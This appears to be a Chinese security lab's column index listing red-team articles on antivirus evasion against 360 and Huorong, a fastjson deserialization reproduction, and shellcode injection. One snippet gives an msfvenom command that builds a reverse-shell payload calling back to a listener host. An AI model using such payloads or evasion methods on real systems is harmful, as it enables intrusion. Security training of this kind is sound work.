首页
学习
活动
专区
工具
TVP
发布

Ms08067安全实验室

www.ms08067.com
专栏作者
318
文章
419726
阅读量
57
订阅数
五种免杀bypass火绒360姿势横向测评:哪款更适合你?
编译生成Project1.exe,将其传入装有360和火绒的Windows靶机进行免杀测试。
Ms08067安全实验室
2022-05-27
3.2K0
安全学习方法 之 上手测试以《Bypass Shellcode-Encryptor》为例
当然还是有很多小伙伴会仔细阅读并加以实操研究。学习安全最为重要的就是动手操作,APP漏洞挖掘不上手测试永远学不会,代码不上手敲你永远不知道自己的水平(很菜的那种!),免杀不在实际环境中测试就不清楚它到底能否免杀等等。
Ms08067安全实验室
2022-02-10
2970
fastjson-cnvd-2017-02833漏洞复现 | Web漏洞挖掘班作业
fastjson在解析json的过程中,支持使用@type字段来指定反序列化的类型,并调用该类的set/get方法来访问属性,当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,即可构造出一些恶意利用链。在Fastjson 1.2.47及以下版本中,利用其缓存机制可实现对未开启autotype功能的绕过。
Ms08067安全实验室
2021-12-08
9960
红队培训班作业 | 五种免杀bypass火绒360姿势横向测评:哪款更适合你?
编译生成Project1.exe,将其传入装有360和火绒的Windows靶机进行免杀测试。
Ms08067安全实验室
2021-09-07
1.5K0
远控免杀专题(13)-zirikatu免杀(VT免杀率39/71)
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
Ms08067安全实验室
2020-04-01
1.8K0
远控免杀专题文章(4)-Evasion模块免杀(VT免杀率12/71)
1、远控免杀专题文章(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg
Ms08067安全实验室
2020-02-24
1K0
【翻译】创建线程shellcode注入
msfvenom -p windows/x64/shell_reverse_tcpLHOST=10.0.0.5LPORT=443-f c -b \x00\x0a\x0d
Ms08067安全实验室
2019-09-24
1.1K0
没有更多了
社区活动
RAG七天入门训练营
鹅厂大牛手把手带你上手实战
Python精品学习库
代码在线跑,知识轻松学
博客搬家 | 分享价值百万资源包
自行/邀约他人一键搬运博客,速成社区影响力并领取好礼
技术创作特训营·精选知识专栏
往期视频·千货材料·成员作品 最新动态
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档